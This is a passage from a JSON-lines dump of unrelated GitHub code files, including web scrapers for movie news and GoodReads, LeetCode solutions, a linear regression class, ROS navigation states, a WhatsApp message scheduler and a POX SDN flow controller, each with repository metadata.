re.search(r'senseid=(\"product\")',j[index])\r\n if matchProduct:\r\n senseActual.append('phone')\r\n sensePredicted.append('product')\r\n else:\r\n senseActual.append('product')\r\n sensePredicted.append('phone')\r\n\r\n\r\nanswerList = pd.Series(sensePredicted, name = 'Prediction')\r\nkeyList = pd.Series(senseActual, name = 'Actual')\r\nconfusionMatrix = pd.crosstab(answerList, keyList, margins = True)\r\n\r\nprint(\"Overall accuracy of tagging: \" + str(accuracy) + \"%\")\r\nprint(\"Overall accuracy of baseline sense: \" + str(answerBaseline) + \"%\" + \"\\n\")\r\nprint(confusionMatrix)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saehaana/cmsc416","sub_path":"Word Sense Disambiguation/scorerWSD.py","file_name":"scorerWSD.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22139347906","text":"import re\nimport os\nimport json\nfrom collections import Counter\nfrom urllib.parse import urlparse\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef clean_html(html : str) -> str:\n clean = re.compile('<.*?>')\n clean_text = re.sub(clean, '', html) # remove all html tag\n for char in ['\\n', '\\t', '\\r']: # remove escape character\n clean_text = clean_text.replace(char, '')\n clean_text = re.sub(' +', ' ', clean_text)\n return clean_text\n\ndef remove_unuse_tag(bs : BeautifulSoup) -> BeautifulSoup:\n unuse_tag = ['script', 'style ', 'noscript', 'head', 'footer', 'iframe']\n for tag in unuse_tag:\n for s in bs.select(tag):\n if s != None:\n s.extract()\n return bs\n\ndef count_link_ref(bs : BeautifulSoup, current_domain : str) -> Counter:\n c = Counter()\n s = set()\n for a in bs.find_all('a'):\n try:\n domain = urlparse(a.attrs['href']).netloc\n if (domain in default_domain) and (domain != current_domain):\n if domain not in s:\n s.add(domain)\n c[domain] += 1\n else:\n continue\n except KeyError: # no href found\n continue\n if current_domain in ['collider.com', 'www.cbr.com']:\n c['screenrant.com'] = 0\n if current_domain in ['screenrant.com']:\n c['www.cbr.com'] = 0\n return c\n\ndef get_data(domain : str) -> dict:\n if os.path.exists(f'./data/web-data/{domain}/data.json'):\n data = open(f'./data/web-data/{domain}/data.json', encoding=\"UTF-8\")\n data = json.load(data)\n return data\n else:\n return {}\n \ndef get_metadata(domain : str) -> dict:\n if os.path.exists(f'./data/web-data/{domain}/metadata.json'):\n metadata = open(f'./data/web-data/{domain}/metadata.json', encoding=\"UTF-8\")\n metadata = json.load(metadata)\n metadata['ref'] = Counter(metadata['ref'])\n metadata['web'] = set(metadata['web'])\n return metadata\n else:\n metadata = {\n 'domain' : domain,\n 'ref' : Counter(),\n 'web' : set()\n }\n return metadata\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88) Gecko/20100101 Firefox/88.0'}\n\ndefault_domain = [\n 'collider.com',\n 'editorial.rottentomatoes.com',\n 'entertainment.ie',\n 'movie2news.com',\n 'movieweb.com',\n 'screenrant.com',\n 'wegotthiscovered.com',\n 'www.cbr.com',\n 'www.cinemablend.com',\n 'www.empireonline.com',\n 'www.hollywoodreporter.com',\n 'www.irishtimes.com',\n 'www.ign.com',\n 'www.joblo.com',\n 'www.movienewsnet.com',\n 'www.nme.com',\n 'www.sanook.com',\n 'www.slashfilm.com',\n 'www.thewrap.com',\n 'www.firstshowing.net'\n]","repo_name":"ThanabodeeSaepui/EZ-Scrap","sub_path":"WebScrap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10068968113","text":"import pywhatkit\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n\r\ndef clk():\r\n\r\n con=True\r\n\r\n while con:\r\n\r\n try:\r\n\r\n H=int(input(\"Enter the hour in 24 hour clock format:\"))\r\n\r\n M=int(input(\"Enter the minute in 24 hour clock format:\"))\r\n\r\n except:\r\n\r\n print(\"\\nInvalid time. Enter digits. Please re-enter\")\r\n\r\n else:\r\n\r\n now=datetime.now()\r\n\r\n h=int(now.strftime(\"%H\"))\r\n\r\n m=int(now.strftime(\"%M\"))\r\n\r\n if H>=h and M>m+1 :\r\n\r\n if 0<=H<=24 and 0<=M<60:\r\n\r\n con=False\r\n\r\n else:\r\n\r\n print(\"\\nInvalid time. Please re-enter\")\r\n\r\n else:\r\n\r\n if 0<=H<=24 and 0<=M<60:\r\n\r\n print(\"Message Will be sent tomorrow\")\r\n\r\n w=input(\"Is it okay ( y-yes , n-no ) :\")\r\n\r\n if w==\"y\" or w==\"Y\":\r\n\r\n con=False\r\n\r\n else:\r\n\r\n print(\"\\nPlease re-enter time.\")\r\n\r\n else:\r\n\r\n print(\"\\nInvalid time. Please re-enter\")\r\n\r\n return H,M\r\n\r\n\r\n\r\ndef num():\r\n\r\n con=True\r\n\r\n while con:\r\n\r\n k=\"+94\"+str(input(\"Please the phone number : +94\"))\r\n\r\n if len(k)==12:\r\n\r\n try:\r\n\r\n v=int(k[1:])\r\n\r\n con=False\r\n\r\n except:\r\n\r\n print(\"\\nPlease enter a valid phone number.\")\r\n\r\n else:\r\n\r\n print(\"\\nPlease enter a valid phone number.\")\r\n\r\n return k\r\n\r\n \r\n\r\n\r\n\r\nnumber=num()\r\n\r\nmsg=str(input(\"Please enter your message :\"))\r\n\r\nhour,minute=clk()\r\n\r\nprint(\"\\n \\n Please wait. Your message is processing. Message will be sent at \"+str(hour)+\":\"+str(minute))\r\n\r\npywhatkit.sendwhatmsg(number,msg,hour,minute,60)\r\n\r\nprint(\"\\n \\n Your message sent successfully\")\r\n\r\n","repo_name":"vps4618/spambots","sub_path":"dist1/whatsapp_auto.py","file_name":"whatsapp_auto.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71868535319","text":"class Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n x = sorted(nums1 + nums2)\n if (len(x))%2 != 0:\n return x[len(x)//2]\n else:\n return float((x[int(len(x)//2)] + x [int((len(x)//2)-1)]))/2\n ","repo_name":"Paulie-Aditya/leetcode_problems","sub_path":"0004-median-of-two-sorted-arrays/0004-median-of-two-sorted-arrays.py","file_name":"0004-median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33885870267","text":"import numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression(object):\n\n def __init__(self, learning_rate=0.001, epoch=1000):\n self.w = None\n self.lr = learning_rate\n self.epoch = epoch\n self.error = []\n self.epoch_cycle = []\n self.r2_score = None\n\n def fit(self, X, y, ridge_parameter = 0): \n self.w = np.zeros((1, X.shape[1]))\n X = np.array(X)\n for i in range(self.epoch):\n y_pred = X.dot(self.w.T)\n self.error.append(self.__mse__(y, y_pred))\n self.epoch_cycle.append(i)\n dw = self.gradient_descent(y_pred, y, X)\n correction = -(self.lr * dw) + 2*ridge_parameter*self.w\n self.w += correction\n print(self.w)\n \n def gradient_descent(self, y_pred, y_act, X):\n y_act = np.array(y_act).reshape(len(y_act), 1)\n diff = y_act - y_pred\n dw = -2*diff.T@(X)\n return dw\n \n def predict(self, X_test):\n return X_test.dot(self.w.T)\n \n def __mse__(self, y, y_hat):\n y = np.array(y).reshape(len(y), 1)\n diff = y - y_hat\n return 0.5 * np.array(diff.T@diff)[0][0]\n \n def plot_error(self):\n plt.plot(self.epoch_cycle, self.error)\n plt.xlabel(\"epochs\")\n plt.ylabel(\"MSE\")\n \n def score(self, x_test, y_test):\n y_pred = self.predict(x_test)[0]\n y_test_pred = np.array(y_pred.values.tolist())\n y_test = np.array(y_test.values.tolist())\n ssr = np.sum((y_pred - y_test)**2)\n sst = np.sum((y_test - np.mean(y_test))**2)\n self.r2_score = 1 - (ssr/sst)\n return self.r2_score\n\n\n\n# secondary_df = pd.read_csv('all_features.csv')\n# X_one_degree = secondary_df[['theta', 'theta_dot', 'constant']]\n# Y_one_degree = secondary_df['theta_ddot']\n# from sklearn.model_selection import train_test_split\n\n# X_1_train, X_1_test, y_1_train, y_1_test = train_test_split(X_one_degree, Y_one_degree, test_size=0.2, random_state=42)\n# lr_one_deg = LinearRegression()\n# lr_one_deg.fit(X_1_train, y_1_train)\n# lr_one_deg.plot_error()\n# plt.show()","repo_name":"Daishinkan002/ML-DL_Algorithms_from_Scratch","sub_path":"Custom_Linear_Regression.py","file_name":"Custom_Linear_Regression.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626230676","text":"\"\"\"\nGiven an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.\n\nHere, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.\n\nNote:\nYou are not suppose to use the library's sort function for this problem.\n\nclick to show follow up.\n\nFollow up:\nA rather straight forward solution is a two-pass algorithm using counting sort.\nFirst, iterate the array counting number of 0's, 1's, and 2's, then overwrite array with total number of 0's, then 1's and followed by 2's.\n\nCould you come up with an one-pass algorithm using only constant space?\n\"\"\"\n\n\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n \"\"\"\n Method 1: Dutch National Flag - Two Pointer Approach\n Your runtime beats 75.39 % of python submissions\n\n while mid <= high:\n IF mid == 0: SWAP mid and low\n IF mid == 1: NO SWAP, mid += 1\n IF mid == 2: SWAP mid and high\n \"\"\"\n\n low = 0\n mid = 0\n high = len(nums) - 1\n\n while mid <= high:\n if nums[mid] == 0:\n nums[mid], nums[low] = nums[low], nums[mid]\n low += 1\n mid += 1\n\n elif nums[mid] == 1:\n mid += 1\n\n else:\n nums[mid], nums[high] = nums[high], nums[mid]\n high -= 1\n\n","repo_name":"KartikKannapur/Algorithms","sub_path":"00_Code/01_LeetCode/75_SortColors.py","file_name":"75_SortColors.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"34199723331","text":"# Customized functions specifically for the Soundscape Attributes Translation Project (SATP) database\n\nimport pandas as pd\n\n\ndef _url_fetch(version: str) -> str:\n \"\"\"\n Return the URL to fetch the SATP dataset from Zenodo.\n Parameters\n ----------\n version : str\n Version of the dataset to load.\n Returns\n -------\n url : str\n URL to fetch the SATP dataset from Zenodo.\n \"\"\"\n if version.lower() not in [\"latest\", \"v1.2.1\", \"v1.2\"]:\n raise ValueError(\n \"Invalid version. Should be either 'latest', 'v1.2.1', or 'v1.2'.\"\n )\n\n version = \"v1.2.1\" if version == \"latest\" else version.lower()\n if version in [\"v1.2.1\", \"v1.2\"]:\n url = \"https://zenodo.org/record/7143599/files/SATP%20Dataset%20v1.2.xlsx\"\n\n return url\n\n\ndef load_zenodo(version: str = \"latest\") -> pd.DataFrame:\n \"\"\"\n Load the SATP dataset from Zenodo.\n Parameters\n ----------\n version : str, optional\n Version of the dataset to load. The default is \"latest\".\n Returns\n -------\n df : pandas.DataFrame\n Dataframe containing the SATP dataset.\n \"\"\"\n url = _url_fetch(version)\n return pd.read_excel(url, engine=\"openpyxl\", sheet_name=\"Main Merge\")\n\n\ndef load_participants(version: str = \"latest\") -> pd.DataFrame:\n \"\"\"\n Load the SATP participants dataset from Zenodo.\n Parameters\n ----------\n version : str, optional\n Version of the dataset to load. The default is \"latest\".\n Returns\n -------\n df : pandas.DataFrame\n Dataframe containing the SATP participants dataset.\n \"\"\"\n url = _url_fetch(version)\n return pd.read_excel(url, engine=\"openpyxl\", sheet_name=\"Participants\").drop(\n columns=[\"Unnamed: 3\", \"Unnamed: 4\"]\n )\n","repo_name":"MitchellAcoustics/Soundscapy","sub_path":"soundscapy/databases/satp.py","file_name":"satp.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"85"} +{"seq_id":"29010750991","text":"import art\nimport os\n\nprint(art.logo)\nprint(\"Welcome to the Secret Auction.\")\n\nauction_dictionary = {}\nmax_bidder = \"\"\nmax_bid_amount = 0\n\nplay_again = True\nwhile play_again:\n name = input(\"What is your name?: \")\n bid = int(input(\"What's your bid?: $\"))\n\n auction_dictionary[name] = bid\n\n other_bidders = input(\"Are there any other bidders? Type 'yes' or 'no'. \").lower()\n if other_bidders == 'yes':\n os.system('cls')\n if other_bidders == 'no':\n for key in auction_dictionary:\n if auction_dictionary[key] > max_bid_amount:\n max_bid_amount = auction_dictionary[key]\n max_bidder = key\n\n max_bid_text = str(max_bid_amount)\n print(\"The winner is \" + max_bidder + \" with a bid of $\" + max_bid_text)\n play_again = False\n","repo_name":"alexislayvu/Python-Projects","sub_path":"Secret Auction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8681070614","text":"import actionlib\nimport rospy\nimport smach\n\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\nfrom geometry_msgs.msg import Twist\n\n\nclass DriveState(smach.State):\n \"\"\"A state that can directly control the robot.\"\"\"\n\n def __init__(self, outcomes, rate_hz=10):\n smach.State.__init__(self, outcomes=outcomes)\n self.rate = rospy.Rate(rate_hz)\n self.pub_node = rospy.Publisher(\"cmd_vel\", Twist, queue_size=1)\n\n def execute(self, userdata):\n raise NotImplementedError()\n\n\nclass NavState(smach.State):\n \"\"\"A state that uses the nav stack to control the robot.\"\"\"\n\n def __init__(self, outcomes):\n smach.State.__init__(self, outcomes=outcomes)\n self.client = actionlib.SimpleActionClient(\"move_base\", MoveBaseAction)\n self.client.wait_for_server()\n\n def execute(self, userdata):\n raise NotImplementedError()\n\n def move_to_relative_point(self, position, orientation, relative_frame, block=True):\n \"\"\"Use the move base server to navigate to a point.\n\n :param positin: A position relative to the relative_frame coord frame\n :param orientation: Orientation relative to relative_frame\n \"\"\"\n goal = MoveBaseGoal()\n goal.target_pose.header.frame_id = relative_frame\n goal.target_pose.pose.position = position\n goal.target_pose.pose.orientation = orientation\n self.client.send_goal(goal)\n if block:\n self.client.wait_for_result()\n","repo_name":"bofrim/Experimental-Mobile-Robotics","sub_path":"comp4/src/utility_states.py","file_name":"utility_states.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19000440543","text":"from prac6.guitar import Guitar\n\nguitars = []\nprint(\"My guitars!\")\n\nguitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\nguitars.append(Guitar(\"Line 6 JTV-59\", 2010, 1512.9))\n\nprint(\"\\nThese are my guitars:\")\nfor i, guitar in enumerate(guitars):\n if guitar.is_vintage():\n vintage_string = \"(vintage)\"\n else:\n vintage_string = \"\"\n print(\"Guitar {}: {:<15} ({}), worth ${:10,.2f}{}\".format(i + 1, guitar.name, guitar.year, guitar.cost, vintage_string))","repo_name":"yangyangli714/CP1404pracs","sub_path":"prac6/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19331332058","text":"#\n# Create by Hua on 9/14/22\n#\n\n\"\"\"\nYou are given an m x n integer matrix points (0-indexed). Starting with 0 points, you want to maximize the number of points you can get from the matrix.\n\nTo gain points, you must pick one cell in each row. Picking the cell at coordinates (r, c) will add points[r][c] to your score.\n\nHowever, you will lose points if you pick a cell too far from the cell that you picked in the previous row. For every two adjacent rows r and r + 1 (where 0 <= r < m - 1), picking cells at coordinates (r, c1) and (r + 1, c2) will subtract abs(c1 - c2) from your score.\n\nReturn the maximum number of points you can achieve.\n\nabs(x) is defined as:\n\nx for x >= 0.\n-x for x < 0.\n\n\nExample 1:\n\n\nInput: points = [[1,2,3],[1,5,1],[3,1,1]]\nOutput: 9\nExplanation:\nThe blue cells denote the optimal cells to pick, which have coordinates (0, 2), (1, 1), and (2, 0).\nYou add 3 + 5 + 3 = 11 to your score.\nHowever, you must subtract abs(2 - 1) + abs(1 - 0) = 2 from your score.\nYour final score is 11 - 2 = 9.\nExample 2:\n\n\nInput: points = [[1,5],[2,3],[4,2]]\nOutput: 11\nExplanation:\nThe blue cells denote the optimal cells to pick, which have coordinates (0, 1), (1, 1), and (2, 0).\nYou add 5 + 3 + 4 = 12 to your score.\nHowever, you must subtract abs(1 - 1) + abs(1 - 0) = 1 from your score.\nYour final score is 12 - 1 = 11.\n\n\nConstraints:\n\nm == points.length\nn == points[r].length\n1 <= m, n <= 105\n1 <= m * n <= 105\n0 <= points[r][c] <= 105\n\n\"\"\"\n\n\nclass Solution(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n\n thought: 2d dp. each dp contains the max value picked so far, return the max of last row.\n time: BF solution is o(m*n*n), which will TLE, given m*n == 10^5\n for each point, it will check n times; and there are m*n points.\n\n the hard part is how to optimize it from o(m*n*n) to o(m*n)\n\n the optimization idea is to check both left and right elements.\n\n similar problem, check out 1014 and 931.\n\n 09/14/2022 15:50\tAccepted\t3721 ms\t50.1 MB\tpython\n medium - hard(if must optimize the solution to o(m*n), not very intuitive)\n google.\n dp.\n\n \"\"\"\n m,n = len(points), len(points[0])\n dp = [0]* n\n for i in range(m):\n for j in range(n): # means choose the item directly above\n dp[j] += points[i][j]\n\n for j in range(n-2, -1,-1): # choose item from its right\n dp[j] = max(dp[j], dp[j+1] -1)\n\n for j in range(1,n): # choose item from its left\n dp[j] = max(dp[j], dp[j-1] - 1)\n\n return max(dp) # return cur will be error if only one row\n\nclass Solution_easy_understand(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n\n thought: 2d dp. each dp contains the max value picked so far, return the max of last row.\n time: BF solution is o(m*n*n), which will TLE, given m*n == 10^5\n for each point, it will check n times; and there are m*n points.\n\n the hard part is how to optimize it from o(m*n*n) to o(m*n)\n\n the optimization idea is to check both left and right elements.\n\n So for each element in a row, instead of traversing prev whole row\n what we can do is that keep left and right vectors to get max from 0 to i-1th in left side, and i+1th to n-1 in right side\n\n left[i] = max(point[i], left[i-1] - 1)\n now why this?\n\n Now for each cell max is one of when same col, from left side, from right side\n\n using left we will get max from left side, using right vector we will get max from right side\n and at each step we will also compare them with same col val\n\n so for left[0] = prev[0], because there is no element in left side\n for left[1] = max(prev[1], left[0] - 1), this -1 is the difference in cols (0 - 1)\n\n Now next step is important\n for left[2] = max(prev[2], left[1]-1)\n\n at this step, if left[1] had value of just above then we had only subtracted 1 from it, and only 1 should be subtracted only\n but if left[1] had left[0]-1 in it, then left[2] = left[0] - 2, now we can see it automatically subtracted 2 if 0th was max\n\n\n similar problem, check out 1014 and 931.\n https://leetcode.com/problems/maximum-number-of-points-with-cost/discuss/1344888/C%2B%2B-dp-from-O(m-*-n-*-n)-to-O(m-*-n)\n\n 09/14/2022 15:40\tAccepted\t3367 ms\t50.1 MB\tpython\n medium - hard(if must optimize the solution to o(m*n), not very intuitive)\n \"\"\"\n m,n = len(points), len(points[0])\n left, right, pre,cur = [0]*n, [0]*n,[0]*n,[0]*n\n\n # init pre\n for i in range(n):\n pre[i] = points[0][i]\n\n for i in range(1, m):\n # right to left\n right[n-1] = pre[n-1]\n for j in range(n-2,-1,-1):\n right[j] = max(pre[j], right[j+1] - 1)\n\n # left to right\n left[0] = pre[0]\n for j in range(1,n):\n left[j] = max(pre[j], left[j-1] - 1)\n\n # combine\n for j in range(n):\n cur[j] = points[i][j] + max(left[j], right[j])\n\n pre = cur\n return max(pre) # return cur will be error if only one row\n\n\n","repo_name":"zerghua/leetcode-python","sub_path":"dp/N1937_MaximumNumberofPointswithCost.py","file_name":"N1937_MaximumNumberofPointswithCost.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"29004814234","text":"\n\n\nfrom typing import List\n\n\nclass Solution:\n def combinationSum4(self, nums: List[int], target: int) -> int:\n \"\"\"经典背包问题\"\"\"\n dp = [0] * (target + 1)\n dp[0] = 1 # 空集和为0,即为1种方案!非常的关键\n for i in range(1, len(dp)):\n for num in nums:\n if i >= num:\n dp[i] += dp[i - num]\n return dp[-1]\n\n def baoli(self, nums, target):\n def helper(nums, target):\n if target < 0:\n return\n\n if target == 0:\n self.res1 += 1\n\n for i in range(len(nums)):\n helper(nums, target - nums[i])\n\n self.res1 = 0\n helper(nums, target)\n return self.res1","repo_name":"Annihilation7/Leetcode-Love","sub_path":"2020-03/3-25/377数组总和IV/377.py","file_name":"377.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73545195159","text":"import os\nfrom typing import List, Tuple, Any\nfrom graphviz import Digraph as gDigraph\nfrom networkx import DiGraph as nDigraph\n\nfrom DataObjects.ClassMultiDict import MultiDict\n\n\nclass ParserPCCGraph:\n EdgeFontSizeInt = '10'\n EdgeFontSizeLoop = '8'\n NodeFontSizeLoop = '12'\n TextFontSize = '15'\n\n def __init__(self, header: str, edges: List[Tuple[str]], option=0, show_pdf = True):\n # Compass points currently not used, as not more than 4 loops were observed\n # CompassPoints=[\"n\",\"ne\",\"e\",\"se\",\"s\",\"sw\",\"w\",\"nw\",\"c\",\"_\"]\n\n # Create FSM graphs\n self.graph = gDigraph(header, filename=(header + '.gv'), engine='dot')\n # Use Splines and resolve Node overlapping\n self.graph.attr(splines='true')\n # Graph direction\n self.graph.attr(rankdir='LR') # 'LR'\n # Internode and edge spacing\n\n if option == 0:\n self.graph.attr(nodesep='0.4', ranksep='2')\n self.graph.attr(ratio='0.5')\n else:\n self.graph.attr(nodesep='0.1', ranksep='0.3')\n self.graph.attr(ratio='0.2')\n\n # Label[RespMsg,FinalState]\n self.graph.attr(label=header, fontsize=self.TextFontSize)\n\n self._pedges(edges)\n\n if show_pdf:\n self.graph.view(header, os.getcwd(), False)\n else:\n self.graph.render(header, os.getcwd())\n\n def _pedges(self, edges, color='black'):\n multi_state_dict = MultiDict()\n for edge in edges:\n\n first_node = edge[0]\n if str(first_node) in multi_state_dict:\n if first_node not in multi_state_dict[str(first_node)]:\n multi_state_dict[str(first_node)] = first_node\n else:\n multi_state_dict[str(first_node)] = first_node\n\n first_index = str(multi_state_dict[str(first_node)].index(first_node))\n\n second_node = edge[1]\n if str(second_node) in multi_state_dict:\n if second_node not in multi_state_dict[str(second_node)]:\n multi_state_dict[str(second_node)] = second_node\n else:\n multi_state_dict[str(second_node)] = second_node\n\n second_index = str(multi_state_dict[str(second_node)].index(second_node))\n\n self.graph.edge(str(edge[0]) + first_index,\n str(edge[1]) + second_index,\n fontsize=self.EdgeFontSizeInt,\n fontcolor=color\n )\n @staticmethod\n def debug_process_graph(process_tree: nDigraph, transition_label: str, show_graph: bool = True):\n edges = [e for e in process_tree.edges]\n ParserPCCGraph(transition_label, edges, 0, show_graph)\n","repo_name":"Errare-humanum-est/HeteroGen","sub_path":"Debug/Graphv/ParserNetworkxGraph.py","file_name":"ParserNetworkxGraph.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"33846760360","text":"from pox.core import core\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr\n\nclass Chris( object ):\n\n\tdef __init__(self):\n\t\tcore.openflow.addListeners(self)\n\n\tdef _handle_PacketIn(self, event):\n\n\t\t\n\t\tdef host1():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 1\n\t\t\tmsg.match.tp_dst = 8000\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.3\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 3))\n\t\t\tevent.connection.send(msg)\n\n\t\tdef host2():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 2\n\t\t\tmsg.match.tp_dst = 8000\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.4\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 4))\n\t\t\tevent.connection.send(msg)\n\n\t\tdef host3():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 3\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.1\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 1))\n\t\t\tevent.connection.send(msg)\n \n\t\tdef host4():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 4\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.2\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 2))\n\t\t\tevent.connection.send(msg)\n\n\t\thost1()\n\t\thost2()\n\t\thost3()\n\t\thost4()\n\t\t\n\ndef launch():\n\tprint(\"CHRIS IS UP\")\n\tcore.registerNew( Chris )\n\t","repo_name":"Paul-weqe/pox-controllers","sub_path":"acl.py","file_name":"acl.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14937235894","text":"from bs4 import BeautifulSoup\nimport itertools\nimport urllib.request\nimport requests, json, csv\n\nGOODREADS_URL = 'https://www.goodreads.com/review/list/62504919-cameron-milne?' #Replace with your link\n\n### GoodReads Data\ndef scrape_goodreads_page(url, page_number):\n '''Scrapes GoodReads reading history into a dictionary\n\n This function takes in a particular page of one's GoodReads reading history\n and scrapes relevant statistics for every book on that page. \n\n Parameters\n ----------\n URL of page\n\n Returns:\n -------\n List of lists; all lists within the list are an individual book and its data\n '''\n\n page_number_string = 'page=' + str(page_number)\n PAGE_URL = url + page_number_string\n\n page = requests.get(PAGE_URL)\n soup = BeautifulSoup(page.content, 'html.parser')\n tables = soup.find_all('table')\n #print(len(soup.find_all('table'))) #There are 2 tables; the books are in the second\n book_table = tables[1]\n\n #Headers: Working!\n headers = []\n column_headers = book_table.find_all('th')\n for column in column_headers:\n headers.append(column['alt'])\n\n #Rows\n page_list = []\n table_rows = book_table.find_all('tr')\n for row in table_rows[1:]:\n\n #Title: Needs edits\n childTag = row.find(class_='field title').find('div').find('a').find('span')\n if childTag:\n title_mess = row.find(class_='field title').find('div').text.strip()\n indented_list = title_mess.splitlines()\n new_list = []\n for line in indented_list:\n new_line = line.strip()\n new_list.append(new_line)\n title = ' '.join(new_list)\n else:\n title = row.find(class_='field title').find('div').find('a').text.strip()\n\n\n #Column Extraction\n author = row.find(class_='field author').find('div').find('a').text.strip()\n isbn = row.find(class_='field isbn').find('div').text.strip()\n isbn13 = row.find(class_='field isbn13').find('div').text.strip()\n num_pages_string = row.find(class_='field num_pages').find('div').text.strip()\n num_pages = ''.join(i for i in num_pages_string if i.isdigit())\n avg_rating = row.find(class_='field avg_rating').find('div').text.strip()\n num_ratings = row.find(class_='field num_ratings').find('div').text.strip()\n num_ratings_converted = int(num_ratings.replace(',', ''))\n date_pub = row.find(class_='field date_pub').find('div').text.strip()\n date_pub_edition = row.find(class_='field date_pub_edition').find('div').text.strip()\n rating = row.find(class_='field rating').find('div').text.strip()\n\n #Shelves: Needs to be Checked\n shelves = row.find(class_='field shelves').find('div').find('a').text.strip()\n\n read_count = row.find(class_='field read_count').find('div').text.strip()\n date_started = row.find(class_='field date_started').find('div').find('span').text.strip()\n date_read = row.find(class_='field date_read').find('div').find('span').text.strip()\n date_added = row.find(class_='field date_added').find('div').find('span').text.strip()\n\n #adding to list\n row_list = []\n row_list.append(title)\n row_list.append(author)\n row_list.append(isbn)\n row_list.append(isbn13)\n row_list.append(num_pages)\n row_list.append(avg_rating)\n row_list.append(num_ratings_converted)\n row_list.append(date_pub)\n row_list.append(date_pub_edition)\n row_list.append(rating)\n row_list.append(shelves)\n row_list.append(read_count)\n row_list.append(date_started)\n row_list.append(date_read)\n row_list.append(date_added)\n\n #Appending row data to the list of rows for a single page\n page_list.append(row_list)\n return page_list\n\ndef combine_page_lists(library_list):\n '''Combine Collections of Lists by Page\n\n Takes a list of lists and combines those lists into one using\n the itertools library.\n\n Parameters\n ----------\n library_list: a list of lists\n\n returns\n -------\n list: flattened list\n '''\n flatten = itertools.chain.from_iterable\n return list(flatten(library_list))\n\ndef convert_list_to_csv(one_big_list):\n '''Converts the flattened list a CSV file\n\n Takes a list of values and writes them to a CSV file\n\n Parameters\n ----------\n one_big_list: a specific list produced from combine_page_lists()\n\n returns:\n --------\n CSV file: 'ReadingHistory.csv'\n '''\n fields = [\n 'Title',\n 'Author',\n 'ISBN',\n 'IBSN13',\n 'Number of Pages',\n 'Average Rating',\n 'Number of Ratings',\n 'Publish Date',\n 'Publish Date Edition',\n 'My Rating',\n 'Shelves',\n 'Read Count',\n 'Date Started',\n 'Date Read',\n 'Date Added',\n ]\n\n filename = 'ReadingHistory.csv'\n with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n csvwriter = csv.writer(csvfile) # creating a csv writer object\n csvwriter.writerow(fields) # writing the fields\n csvwriter.writerows(one_big_list) # writing the data rows\n\nif __name__ == \"__main__\":\n\n print(f\"\")\n print(f\"This program could take several minutes to complete:\")\n print(f\"\")\n\n #Calling functions\n goodreads_page_data = 